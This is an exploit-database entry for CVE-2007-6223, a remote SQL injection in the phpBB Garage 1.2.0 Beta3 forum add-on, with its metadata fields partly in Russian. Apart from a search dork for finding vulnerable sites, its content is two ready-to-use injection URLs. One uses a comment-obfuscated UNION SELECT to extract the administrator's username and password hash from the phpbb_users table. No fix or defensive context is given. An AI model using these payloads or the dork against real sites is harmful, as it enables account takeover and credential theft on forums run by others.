Exploit phpBB Garage 1.2.0 Beta3 - SQL Injection

[Exploiter]

EDB-ID

4686

Проверка EDB

1. Пройдено

Автор

MAKU234

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-6223

Дата публикации

2007-12-03

Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234
E-Mail: [email protected]



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*

# milw0rm.com [2007-12-03]